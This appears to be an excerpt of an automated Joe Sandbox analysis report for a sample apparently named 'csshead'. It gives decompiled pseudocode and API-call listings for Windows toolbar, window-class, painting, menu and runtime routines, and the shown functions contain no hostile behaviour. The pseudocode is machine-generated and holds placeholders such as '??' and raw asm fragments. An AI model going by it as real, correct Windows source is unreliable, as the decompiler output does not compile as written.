UnhookWindowsHookEx.USER32(00442A54), ref: 00416BA1
RtlLeaveCriticalSection.NTDLL(00442B64), ref: 00416BB8
GetMenuItemCount.USER32(00433394), ref: 00416C2A
GetVersionExA.KERNEL32(?,?,00000000,00000090,?,00000000,00000030), ref: 00416C6B
GetMenuItemInfoA.USER32(00433394,00000000,00000001,0000002C), ref: 00416CA3
lstrlen.KERNEL32(?), ref: 00416CDD
SetMenuItemInfoA.USER32(00433394,00000000,00000001,0000002C), ref: 00416CF8
ModifyMenuA.USER32(00433394,00000000,?,?,00000000), ref: 00416D17
GetMenuItemCount.USER32(00433394), ref: 00416D34

Strings

1, xrefs: 00416CBB
2, xrefs: 00416C9B
,, xrefs: 00416C8A
0, xrefs: 00416C4E
Z, xrefs: 00416C83

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 0041EBA0, Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 250
window

C-Code - Quality: 79%

			E0041EBA0(struct HWND__* _a4, signed short _a8, struct HWND__* _a12, long _a16, struct HMENU__* _a20) {
				CHAR* _v4;
				char _v512;
				char _v516;
				char _v524;
				char _v528;
				char _v572;
				char _v576;
				struct HWND__* _v584;
				signed int _v588;
				long _v592;
				int _v596;
				struct HINSTANCE__* _v600;
				int _v604;
				struct HINSTANCE__* _v608;
				void* _v612;
				CHAR* _v616;
				signed short _v620;
				CHAR* _t78;
				struct HRSRC__* _t79;
				void* _t80;
				struct HWND__* _t87;
				long _t91;
				struct HINSTANCE__* _t98;
				signed int _t103;
				signed short _t108;
				signed int _t110;
				struct HINSTANCE__* _t119;
				short* _t125;
				signed int _t128;
				signed short _t134;
				signed short _t138;
				struct HINSTANCE__* _t146;
				struct HINSTANCE__* _t147;
				void* _t149;
				signed int _t157;
				struct HWND__* _t158;
				intOrPtr _t162;
				struct HINSTANCE__* _t163;
				struct HWND__* _t164;
				struct HWND__* _t166;

				_t78 = _a8 & 0x0000ffff;
				_t163 =  *0x442b94; // 0x0
				_v588 = _t163;
				_v604 = _t78;
				_t79 = FindResourceA(_t163, _t78, 0xf1);
				if(_t79 != 0) {
					_t80 = LoadResource(_t163, _t79);
					__eflags = _t80;
					if(_t80 == 0) {
						goto L1;
					} else {
						_t164 = LockResource(_t80);
						__eflags = _t164;
						if(_t164 == 0) {
							return 0;
						} else {
							_t166 = _a12;
							__eflags = _t166;
							_t157 = 0 | _t166 != 0x00000000;
							_v584 = ( *(_t164 + 6) & 0x0000ffff) + _t157;
							_v516 = 0;
							_t87 = L0041EB40( &_v516, ( *(_t164 + 6) & 0x0000ffff) + _t157);
							_v584 = _t87;
							__eflags = _t87;
							if(_t87 != 0) {
								__eflags = _t166;
								if(_t166 != 0) {
									_t87->i = 4;
									 *((intOrPtr*)(_t87 + 4)) = 0;
									 *((short*)(_t87 + 8)) = 0x100;
									 *((intOrPtr*)(_t87 + 0xc)) = 0;
									 *((intOrPtr*)(_t87 + 0x10)) = 0;
								}
								_t146 = 0;
								_t128 = 0;
								_v600 = 0;
								__eflags = 0 -  *(_t164 + 6);
								if(0 <  *(_t164 + 6)) {
									_t125 = _t87 + 8 + (_t157 + _t157 * 4) * 4;
									_t25 = _t146 + 8; // 0x8
									_t162 = _t25;
									do {
										__eflags =  *(_t164 + 8 + _t128 * 2);
										if( *(_t164 + 8 + _t128 * 2) == 0) {
											 *((intOrPtr*)(_t125 - 8)) = _t162;
											 *(_t125 - 4) = 0;
											 *_t125 = 0x100;
										} else {
											 *((intOrPtr*)(_t125 - 8)) = _t146;
											_t146 =  &(_t146->i);
											 *(_t125 - 4) =  *(_t164 + 8 + _t128 * 2) & 0x0000ffff;
											 *_t125 = 4;
										}
										 *((intOrPtr*)(_t125 + 8)) = 0;
										 *((intOrPtr*)(_t125 + 4)) = 0;
										_t128 = _t128 + 1;
										_t125 = _t125 + 0x14;
										__eflags = _t128 - ( *(_t164 + 6) & 0x0000ffff);
									} while (_t128 < ( *(_t164 + 6) & 0x0000ffff));
									_v600 = _t146;
								}
								_t147 =  *0x442b90; // 0x0
								_t158 = CreateWindowExA(0, "ToolbarWindow32", 0, _a16, 0, 0, 0x64, 0x64, _a4, _a20, _t147, 0);
								__eflags = _t158;
								if(_t158 != 0) {
									SendMessageA(_t158, 0x41e, 0x14, 0);
									_t91 = SendMessageA(_t158, 0x31, 0, 0);
									_v608 = _t91;
									__eflags = _t91;
									if(_t91 == 0) {
										_v612 = GetStockObject(0xd);
									}
									_v576 = 0;
									E00422840( &_v572, 0, 0x38);
									_t149 =  &_v576;
									GetObjectA(_v608, 0x3c, _t149);
									asm("cdq");
									_t98 =  *0x442b94; // 0x0
									_v620 = (_v588 ^ _t149) - _t149 & 0x0000ffff;
									_v608 = _t98;
									_t103 =  *(LockResource(LoadResource(_v608, FindResourceA(_t98, _v616, 2))) + 0xe) & 0x0000ffff;
									__eflags = _t103 - 4;
									if(_t103 <= 4) {
										_v608 = _v600;
										_push( &_v608);
										_push(_v612);
										_v604 = 0;
										_v604 = _v4;
										_push(0x413);
									} else {
										_t142 = 0xff000000;
										__eflags = _t103 - 0x20;
										if(_t103 == 0x20) {
											_t142 = 0xffffffffffffffff;
											__eflags = 0xff000000;
										}
										_t119 =  *0x442b94; // 0x0
										_push( *0x43304c(_t119, _v616, _t164->i & 0x0000ffff, 1, _t142, 0, 0x2040));
										_push(0);
										_push(0x430);
									}
									SendMessageA(_t158, ??, ??, ??);
									SendMessageA(_t158, 0x414, _v596, _v592);
									_t108 =  *(_t164 + 4) & 0x0000ffff;
									_t134 = _v620;
									__eflags = _t108 - _t134;
									if(_t108 <= _t134) {
										_t108 = _t134 & 0x0000ffff;
									}
									SendMessageA(_t158, 0x420, 0, (_t108 & 0x0000ffff) << 0x00000010 | _t164->i & 0x0000ffff);
									_t110 =  *(_t164 + 4) & 0x0000ffff;
									_t138 = _v620;
									__eflags = _t110 - _t138;
									if(_t110 <= _t138) {
										_t110 = _t138 & 0x0000ffff;
									}
									SendMessageA(_t158, 0x41f, 0, (_t110 + 0x00000007 & 0x0000ffff) << 0x00000010 | _t164->i + 0x00000007 & 0x0000ffff);
									__eflags = _v528 -  &_v524;
									if(_v528 !=  &_v524) {
										E004049C0( &_v528);
									}
									return _t158;
								}
								__eflags = _v516 -  &_v512;
							} else {
								__eflags = _v516 -  &_v512;
							}
							if(__eflags != 0) {
								E004049C0( &_v516);
							}
							__eflags = 0;
							return 0;
						}
					}
				} else {
					L1:
					return 0;
				}
			}

0x0041eba6
0x0041ebb0
0x0041ebbd
0x0041ebc1
0x0041ebc5
0x0041ebcf
0x0041ebde
0x0041ebe4
0x0041ebe6
0x00000000
0x0041ebe8
0x0041ebef
0x0041ebf3
0x0041ebf5
0x0041ee7e
0x0041ebfb
0x0041ebfc
0x0041ec03
0x0041ec0d
0x0041ec16
0x0041ec1a
0x0041ec1e
0x0041ec23
0x0041ec27
0x0041ec29
0x0041ec38
0x0041ec3a
0x0041ec3c
0x0041ec42
0x0041ec45
0x0041ec4b
0x0041ec4e
0x0041ec4e
0x0041ec51
0x0041ec55
0x0041ec57
0x0041ec5b
0x0041ec5f
0x0041ec64
0x0041ec68
0x0041ec68
0x0041ec70
0x0041ec70
0x0041ec75
0x0041ec8a
0x0041ec8d
0x0041ec90
0x0041ec77
0x0041ec77
0x0041ec7f
0x0041ec80
0x0041ec83
0x0041ec83
0x0041ec95
0x0041ec98
0x0041ec9f
0x0041eca0
0x0041eca3
0x0041eca3
0x0041eca7
0x0041eca7
0x0041ecab
0x0041ecde
0x0041ece0
0x0041ece2
0x0041ed13
0x0041ed1a
0x0041ed1c
0x0041ed20
0x0041ed22
0x0041ed2c
0x0041ed2c
0x0041ed38
0x0041ed3c
0x0041ed48
0x0041ed50
0x0041ed5a
0x0041ed68
0x0041ed6f
0x0041ed73
0x0041ed90
0x0041ed94
0x0041ed97
0x0041eddd
0x0041ede5
0x0041ede6
0x0041ede7
0x0041edeb
0x0041edef
0x0041ed99
0x0041ed99
0x0041ed9e
0x0041eda1
0x0041eda3
0x0041eda3
0x0041eda3
0x0041edaa
0x0041edc5
0x0041edc6
0x0041edc7
0x0041edc7
0x0041edf5
0x0041ee07
0x0041ee09
0x0041ee0d
0x0041ee11
0x0041ee14
0x0041ee16
0x0041ee16
0x0041ee2d
0x0041ee2f
0x0041ee33
0x0041ee37
0x0041ee3a
0x0041ee3c
0x0041ee3c
0x0041ee5d
0x0041ee63
0x0041ee67
0x0041ee6d
0x0041ee6d
0x00000000
0x0041ee75
0x0041ece8
0x0041ec2b
0x0041ec2f
0x0041ec2f
0x0041ecec
0x0041ecf2
0x0041ecf2
0x0041ecfa
0x0041ed03
0x0041ed03
0x0041ebf5
0x0041ebd2
0x0041ebd2
0x0041ebdb
0x0041ebdb

APIs

FindResourceA.KERNEL32(00000000,?,000000F1), ref: 0041EBC5
LoadResource.KERNEL32(00000000,00000000,?,?), ref: 0041EBDE
LockResource.KERNEL32(00000000,?,?), ref: 0041EBE9
CreateWindowExA.USER32(00000000,ToolbarWindow32,00000000,?,00000000,00000000,00000064,00000064,?,?,00000000,00000000), ref: 0041ECD8
SendMessageA.USER32(00000000,0000041E,00000014,00000000), ref: 0041ED13
SendMessageA.USER32(00000000,00000031,00000000,00000000), ref: 0041ED1A
GetStockObject.GDI32(0000000D), ref: 0041ED26
GetObjectA.GDI32(?,0000003C,?), ref: 0041ED50
FindResourceA.KERNEL32(00000000,?,00000002), ref: 0041ED77
LoadResource.KERNEL32(?,00000000,?,?), ref: 0041ED83
LockResource.KERNEL32(00000000,?,?), ref: 0041ED8A
ImageList_LoadImageA.COMCTL32(00000000,?,?,00000001,FF000000,00000000,00002040,?,?), ref: 0041EDBF
SendMessageA.USER32(00000000,00000413,?,?), ref: 0041EDF5
SendMessageA.USER32(00000000,00000414,?,?), ref: 0041EE07
SendMessageA.USER32(00000000,00000420,00000000,?), ref: 0041EE2D
SendMessageA.USER32(00000000,0000041F,00000000,?), ref: 0041EE5D

Strings

ToolbarWindow32, xrefs: 0041ECD2

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 004081D0, Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 154
registry

C-Code - Quality: 97%

			E004081D0(WNDCLASSEXA* __ecx, void** _a4) {
				void _v48;
				char _v92;
				void _v96;
				char _v100;
				struct _CRITICAL_SECTION* _v104;
				struct HINSTANCE__* _v108;
				void* _v112;
				int _t55;
				int _t57;
				int _t61;
				void* _t69;
				WNDCLASSEXA* _t74;
				struct HINSTANCE__* _t94;
				struct HINSTANCE__* _t98;
				CHAR* _t103;
				CHAR* _t106;
				struct HINSTANCE__* _t109;
				struct HINSTANCE__* _t110;
				CHAR* _t111;
				void** _t114;

				_t112 =  &_v112;
				_t74 = __ecx;
				if( *((short*)(__ecx + 0x40)) != 0) {
					L15:
					if( *(_t74 + 0x30) != 0) {
						 *_a4 =  *(_t74 + 0x34);
					}
					return  *(_t74 + 0x40);
				} else {
					_v104 = 0x442b64;
					EnterCriticalSection(0x442b64);
					_v100 = 1;
					if( *(_t74 + 0x40) != 0) {
						L14:
						LeaveCriticalSection(0x442b64);
						goto L15;
					} else {
						_t94 =  *0x442b90; // 0x0
						_t103 =  *(_t74 + 0x30);
						_t109 = _t94;
						_v108 = _t109;
						if(_t103 == 0) {
							asm("sbb edx, edx");
							_t74->hCursor = LoadCursorA( !( ~( *(_t74 + 0x3c))) & _t109,  *(_t74 + 0x38));
							goto L8;
						} else {
							_t111 = _t74->lpszClassName;
							_v112 =  *(_t74 + 8);
							_v96 = 0x30;
							E00422840( &_v92, 0, 0x2c);
							_t114 =  &(( &_v112)[3]);
							if(GetClassInfoExA(_t94, _t103,  &_v96) != 0 || GetClassInfoExA(0,  *(_t74 + 0x30),  &_v96) != 0) {
								_t69 = memcpy(_t74,  &_v96, 0xc << 2);
								_t112 =  &(_t114[3]);
								_t74->lpszClassName = _t111;
								_t109 = _v108;
								 *(_t74 + 0x34) =  *(_t74 + 8);
								 *(_t74 + 8) = _t69;
								L8:
								_t74->style = _t74->style & 0xffffbfff;
								_t74->hInstance = _t109;
								if(_t74->lpszClassName == 0) {
									_t106 = _t74 + 0x42;
									L00404680(_t106, 0xd, "ATL:%p", _t74);
									_t112 =  &(_t112[4]);
									_t74->lpszClassName = _t106;
								}
								_t55 = GetClassInfoExA(_t74->hInstance, _t74->lpszClassName, memcpy( &_v48, _t74, 0xc << 2));
								 *(_t74 + 0x40) = _t55;
								if(_t55 == 0) {
									if( *(_t74 + 0x50) != 0) {
										_t98 =  *0x442b94; // 0x0
										_t57 = GetSystemMetrics(0xc);
										_t74->hIcon = LoadImageA(_t98,  *(_t74 + 0x50) & 0x0000ffff, 1, GetSystemMetrics(0xb), _t57, 0);
										_t110 =  *0x442b94; // 0x0
										_t61 = GetSystemMetrics(0x32);
										_t74->hIconSm = LoadImageA(_t110,  *(_t74 + 0x50) & 0x0000ffff, 1, GetSystemMetrics(0x31), _t61, 0);
									}
									 *(_t74 + 0x40) = RegisterClassExA(_t74);
								}
								goto L14;
							} else {
								LeaveCriticalSection(0x442b64);
								_v100 = 0;
								L004012A0( &_v104);
								return 0;
							}
						}
					}
				}
			}

0x004081d0
0x004081d5
0x004081de
0x0040837c
0x00408380
0x0040838c
0x0040838c
0x00408399
0x004081e4
0x004081e9
0x004081f1
0x004081fc
0x00408201
0x00408371
0x00408376
0x00000000
0x00408207
0x00408207
0x0040820d
0x00408210
0x00408212
0x00408218
0x004082b5
0x004082c3
0x00000000
0x0040821e
0x00408221
0x0040822d
0x00408231
0x00408239
0x0040823e
0x00408252
0x00408299
0x00408299
0x0040829e
0x004082a1
0x004082a5
0x004082a8
0x004082c6
0x004082c6
0x004082d1
0x004082d4
0x004082dc
0x004082e2
0x004082e7
0x004082ea
0x004082ea
0x00408307
0x0040830d
0x00408314
0x0040831a
0x00408322
0x0040832c
0x00408346
0x00408349
0x00408351
0x00408363
0x00408363
0x0040836d
0x0040836d
0x00000000
0x00408265
0x0040826a
0x00408274
0x00408279
0x00408287
0x00408287
0x00408252
0x00408218
0x00408201

APIs

EnterCriticalSection.KERNEL32 ref: 004081F1
GetClassInfoExA.USER32(00000000,?,?), ref: 0040824E
GetClassInfoExA.USER32(00000000,?,?), ref: 0040825F
LeaveCriticalSection.KERNEL32(00442B64), ref: 0040826A

Part of subcall function 004012A0: LeaveCriticalSection.KERNEL32(00000000,?,0040C680), ref: 004012AC

LoadCursorA.USER32(?,?), ref: 004082BD
RegisterClassExA.USER32 ref: 00408367

Part of subcall function 00404680: _vswprintf_s.LIBCMT ref: 00404694

GetClassInfoExA.USER32(?,00000000,?), ref: 00408307
GetSystemMetrics.USER32(0000000C), ref: 0040832C
GetSystemMetrics.USER32(0000000B), ref: 00408331
LoadImageA.USER32(00000000,00000000,00000001,00000000), ref: 00408342
GetSystemMetrics.USER32(00000032), ref: 00408351
GetSystemMetrics.USER32(00000031), ref: 00408356
LoadImageA.USER32(00000000,00000000,00000001,00000000), ref: 00408361
LeaveCriticalSection.KERNEL32(00442B64), ref: 00408376

Strings

0, xrefs: 00408231
d+D, xrefs: 004081E9
ATL:%p, xrefs: 004082D7

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 0040AD70, Relevance: 28.7, APIs: 19, Instructions: 159
window

C-Code - Quality: 100%

			E0040AD70(void* __ecx, int* _a16) {
				void* _v8;
				void* _v12;
				struct tagPAINTSTRUCT _v68;
				struct tagRECT _v84;
				struct tagRECT _v108;
				void* _v120;
				int _v156;
				int _v160;
				struct HDC__* _t38;
				void* _t47;
				intOrPtr* _t55;
				void* _t69;
				void* _t70;
				struct HDC__* _t71;
				void* _t77;
				void* _t90;
				struct HDC__* _t91;
				void* _t92;
				struct HDC__* _t94;

				_t90 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x70)) != 0) {
					if(( *(__ecx + 0x98) & 0x00000008) == 0) {
						 *_a16 = 0;
						goto L18;
					} else {
						_t38 = BeginPaint( *(__ecx + 4),  &(_v68.fErase));
						_t94 = _t38;
						if(_t94 != 0) {
							GetClientRect( *(_t90 + 4),  &(_v84.top));
							_t69 = CreateCompatibleBitmap(_t94, _v84.bottom - _v84.top.left, _v68.hdc - _v84.right.hdc);
							_v108.bottom = _t69;
							if(_t69 != 0) {
								_t91 = CreateCompatibleDC(_t94);
								if(_t91 != 0) {
									_t47 = SelectObject(_t91, _t69);
									_v8 = _t47;
									if(_t47 != 0) {
										_t70 = CreateSolidBrush( *(_t90 + 0xcc));
										if(_t70 != 0) {
											FillRect(_t91,  &_v108, _t70);
											DeleteObject(_t70);
											_t55 =  *((intOrPtr*)(_t90 + 0x70));
											_t77 = _t90 + 0xb4;
											 *((intOrPtr*)( *((intOrPtr*)( *_t55 + 0xc))))(_t55, 1, 0xffffffff, 0, 0, 0, _t91, _t77, _t77, 0, 0);
											BitBlt(_t94, 0, 0, _v160, _v156, _t91, 0, 0, 0xcc0020);
										}
										SelectObject(_t91, _v12);
										_t69 = _v120;
									}
									DeleteDC(_t91);
								}
								DeleteObject(_t69);
							}
							EndPaint( *(_t90 + 4),  &(_v84.right));
							return 1;
						} else {
							return _t38;
						}
					}
				} else {
					_t71 = BeginPaint( *(__ecx + 4),  &(_v68.fErase));
					if(_t71 == 0) {
						L18:
						return 0;
					} else {
						GetClientRect( *(_t90 + 4),  &(_v84.top));
						_t92 = CreateSolidBrush( *(_t90 + 0xcc));
						if(_t92 != 0) {
							FillRect(_t71,  &_v84, _t92);
							DeleteObject(_t92);
						}
						EndPaint( *(_t90 + 4),  &_v68);
						return 1;
					}
				}
			}

0x0040ad76
0x0040ad7c
0x0040adf1
0x0040af16
0x00000000
0x0040adf7
0x0040ae01
0x0040ae07
0x0040ae0b
0x0040ae20
0x0040ae3f
0x0040ae41
0x0040ae47
0x0040ae54
0x0040ae58
0x0040ae60
0x0040ae66
0x0040ae6c
0x0040ae7b
0x0040ae7f
0x0040ae88
0x0040ae8f
0x0040ae95
0x0040ae9e
0x0040aeb5
0x0040aed0
0x0040aed0
0x0040aedc
0x0040aee2
0x0040aee2
0x0040aee7
0x0040aee7
0x0040aeee
0x0040aeee
0x0040aefd
0x0040af0f
0x0040ae0d
0x0040ae14
0x0040ae14
0x0040ae0b
0x0040ad7e
0x0040ad8d
0x0040ad91
0x0040af1e
0x0040af24
0x0040ad97
0x0040ada0
0x0040adb3
0x0040adb7
0x0040adc0
0x0040adc7
0x0040adc7
0x0040add6
0x0040ade7
0x0040ade7
0x0040ad91

APIs

BeginPaint.USER32(?,?), ref: 0040AD87
GetClientRect.USER32(?,?), ref: 0040ADA0
CreateSolidBrush.GDI32(?), ref: 0040ADAD
FillRect.USER32(00000000,?,00000000), ref: 0040ADC0
DeleteObject.GDI32(00000000), ref: 0040ADC7
EndPaint.USER32(?,?), ref: 0040ADD6
BeginPaint.USER32(?,?), ref: 0040AE01
GetClientRect.USER32(?,?), ref: 0040AE20
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0040AE39
CreateCompatibleDC.GDI32(00000000), ref: 0040AE4E
SelectObject.GDI32(00000000,00000000), ref: 0040AE60
CreateSolidBrush.GDI32(?), ref: 0040AE75
FillRect.USER32(00000000,?,00000000), ref: 0040AE88
DeleteObject.GDI32(00000000), ref: 0040AE8F
BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00CC0020), ref: 0040AED0
SelectObject.GDI32(00000000,?), ref: 0040AEDC
DeleteDC.GDI32(00000000), ref: 0040AEE7
DeleteObject.GDI32(00000000), ref: 0040AEEE
EndPaint.USER32(?,?), ref: 0040AEFD

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 0042D421, Relevance: 28.5, APIs: 15, Strings: 1, Instructions: 494fileLIBRARYCODE

APIs

__getptd.LIBCMT ref: 0042D513

Part of subcall function 00425EEB: __amsg_exit.LIBCMT ref: 00425EFB

GetConsoleMode.KERNEL32(00000000,?,?,00000001,?,U&B,0042DBB3,?,00000108,00000000,0043D088,00000010,00424FBB,U&B,00000000,00000001), ref: 0042D531
GetConsoleCP.KERNEL32(?,?,00422655,00000000,?), ref: 0042D551

Part of subcall function 0042DE77: __isleadbyte_l.LIBCMT ref: 0042DE81

__Stoull.NTSTC_LIBCMT ref: 0042D5EB
__Stoull.NTSTC_LIBCMT ref: 0042D60F
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00422655,00000005,00000000,00000000), ref: 0042D641
WriteFile.KERNEL32(00000000,00422655,00000000,?,00000000), ref: 0042D66A
WriteFile.KERNEL32(00000000,00422655,00000001,?,00000000), ref: 0042D6C3

Part of subcall function 00430224: ___initconout.LIBCMT ref: 00430233
Part of subcall function 00430224: WriteConsoleW.KERNEL32(004426B0,00000000,00000001,?,00000000,00000000,?,0042D72B,?), ref: 00430256

WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0042D831
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0042D90B
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000), ref: 0042D9DB
WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0042DA0C
GetLastError.KERNEL32 ref: 0042DA22
WriteFile.KERNEL32(00000000,?,?,?,00000000,?,00000001,?,U&B,0042DBB3,?,00000108,00000000,0043D088,00000010,00424FBB), ref: 0042DA63
GetLastError.KERNEL32(?,?,00422655,00000000,?), ref: 0042DA82

Part of subcall function 00429814: IsDebuggerPresent.KERNEL32 ref: 0042FAF6
Part of subcall function 00429814: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042FB0B
Part of subcall function 00429814: UnhandledExceptionFilter.KERNEL32(0043A498), ref: 0042FB16
Part of subcall function 00429814: GetCurrentProcess.KERNEL32 ref: 0042FB32
Part of subcall function 00429814: TerminateProcess.KERNEL32(00000000), ref: 0042FB39

Part of subcall function 0042D2B2: SetFilePointer.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,0042D4F4,00000000,00000000,00000000,00000002,?,00000001), ref: 0042D2F4
Part of subcall function 0042D2B2: GetLastError.KERNEL32(?,0042D4F4,00000000,00000000,00000000,00000002,?,00000001,?,U&B,0042DBB3,?,00000108,00000000,0043D088,00000010), ref: 0042D301

Strings

U&B, xrefs: 0042D423

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 00415020, Relevance: 28.3, APIs: 11, Strings: 5, Instructions: 279window

APIs

GetMenuItemCount.USER32(?), ref: 00415083
GetVersionExA.KERNEL32(?,?,?,00000090,?,?,00000030), ref: 0041510E
GetMenuItemInfoA.USER32 ref: 0041516C
CharLowerA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,0000002C), ref: 004151C7
CharLowerA.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,0000002C), ref: 004151D2
PostMessageA.USER32(?,00000448,000000FF), ref: 00415226
PostMessageA.USER32(?,00000448,000000FF), ref: 0041529F

Part of subcall function 004140E0: SetFocus.USER32(?), ref: 00414123
Part of subcall function 004140E0: SendMessageA.USER32 ref: 00414141

Part of subcall function 00411630: GetParent.USER32(?), ref: 00411640
Part of subcall function 00411630: SendMessageA.USER32(00000000,0000040C,00000000,00000000), ref: 00411656
Part of subcall function 00411630: GetVersionExA.KERNEL32(?), ref: 0041169F
Part of subcall function 00411630: LoadLibraryA.KERNEL32(00436280), ref: 004116D6
Part of subcall function 00411630: GetProcAddress.KERNEL32(00000000,00436270), ref: 004116EF
Part of subcall function 00411630: FreeLibrary.KERNEL32(00000000), ref: 0041170A
Part of subcall function 00411630: SendMessageA.USER32(00000000,0000041D,00000000,?), ref: 0041174F

IsWindowEnabled.USER32(?), ref: 004152E4
GetClientRect.USER32(?,?), ref: 0041530D

Part of subcall function 004117C0: GetFocus.USER32 ref: 004117D2
Part of subcall function 004117C0: SetFocus.USER32(?), ref: 004117E2

PostMessageA.USER32(?,00000100,00000028), ref: 004153AD

Part of subcall function 00410FF0: SendMessageA.USER32(?,00000448,?,00000000), ref: 00410FFF

Part of subcall function 004128F0: SendMessageA.USER32(?,00000446,00100000,?), ref: 0041292D
Part of subcall function 004128F0: InvalidateRect.USER32(?,00000000,00000001), ref: 0041293B

MessageBeep.USER32 ref: 004153D2

Strings

?, xrefs: 0041515D
/, xrefs: 004152AC
,, xrefs: 00415133
0, xrefs: 004150EB
d, xrefs: 00415152

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 00412EE0, Relevance: 27.3, APIs: 18, Instructions: 311
window

C-Code - Quality: 68%

			E00412EE0(void* __ecx, int _a4, int _a8, long _a12) {
				struct HWND__* _v16;
				intOrPtr _v20;
				struct tagRECT _v44;
				struct tagRECT _v60;
				struct tagRECT _v80;
				struct tagRECT _v96;
				struct tagPOINT _v104;
				struct tagRECT _v120;
				struct tagRECT _v148;
				int _t120;
				struct HWND__* _t121;
				signed int _t131;
				signed int _t134;
				int _t135;
				intOrPtr _t148;
				void* _t163;
				void* _t166;
				intOrPtr* _t184;
				int _t189;
				int _t198;
				void* _t210;
				struct tagRECT* _t224;
				struct HDC__* _t248;
				void* _t250;
				int _t253;

				_t250 = __ecx;
				_t120 = CallWindowProcA( *(__ecx + 0x40),  *(__ecx + 4), _a4, _a8, _a12);
				_a4 = _t120;
				if( *((char*)(_t250 + 0xe8)) == 0) {
					return _t120;
				}
				_t121 =  *(_t250 + 4);
				_a8 = _t121;
				_t248 = GetWindowDC(_t121);
				_v96.bottom.left = 0;
				_v80.left = 0;
				_v80.top.left = 0;
				_v80.right = 0;
				GetWindowRect( *(_t250 + 4),  &(_v96.bottom));
				_t253 = _v80.right - _v80.left;
				_t189 = _v80.top.left - _v96.bottom.left;
				_t224 =  &(_v96.bottom);
				SetRect(_t224, 0, 0,  *(_t250 + 0x110), _t253);
				if( *((intOrPtr*)(_t250 + 0x11c)) == 0) {
					if(( *(_t250 + 0x58) & 0x00000001) == 0) {
						_push(5);
						_t224 =  &(_v96.bottom);
						_push(_t224);
					} else {
						_push(0x10);
						_push( &(_v96.bottom));
					}
					L8:
					FillRect(_t248, ??, ??);
					L9:
					_v80.left = 0;
					_v80.top.left = 0;
					_v80.right = 0;
					_v80.bottom = 0;
					asm("cdq");
					_t131 =  *(_t250 + 0x110) -  *(_t250 + 0x100) - _t224;
					_t198 = _t131 >> 1;
					if(_t131 < 0) {
						_t198 = 0;
					}
					asm("cdq");
					_t134 = _t253 -  *(_t250 + 0x104) - _t224;
					_t135 = _t134 >> 1;
					if(_t134 < 0) {
						_t135 = 0;
					}
					SetRect( &_v80, _t198, _t135,  *((intOrPtr*)(_t250 + 0x108)) + _t198,  *((intOrPtr*)(_t250 + 0x10c)) + _t135);
					DrawIconEx(_t248, _v80, _v80.top.left,  *(_t250 + 0xf0),  *(_t250 + 0x100),  *(_t250 + 0x104), 0, 0, 3);
					SetRect( &_v96, _t189 -  *((intOrPtr*)(_t250 + 0x114)), 0, _t189, _t253);
					if( *((intOrPtr*)(_t250 + 0x11c)) == 0) {
						if(( *(_t250 + 0x58) & 0x00000001) == 0) {
							_push(5);
							_push( &_v96);
						} else {
							_push(0x10);
							_push( &_v96);
						}
						goto L20;
					} else {
						if( *((intOrPtr*)(_t250 + 0x124)) == 0) {
							_push(0x10);
							_push( &_v96);
							L20:
							FillRect(_t248, ??, ??);
							L21:
							_v80.top = 0;
							E00422840( &(_v80.right), 0, 0x2c);
							L00411330(_t250,  &(_v80.right), _t189, _t253,  &(_v80.top), 0);
							_t148 =  *((intOrPtr*)(_t250 + 0x11c));
							if(_t148 == 0) {
								asm("sbb ecx, ecx");
								DrawFrameControl(_t248,  &(_v80.top), 1, ( ~( *(_t250 + 0xf4)) & 0xfffffe00) + 0x200);
								asm("sbb eax, eax");
								DrawFrameControl(_t248,  &_v60, 1, ( ~( *(_t250 + 0xf4) - 1) & 0xfffffe00) + 0x00000200 | 0x00000003);
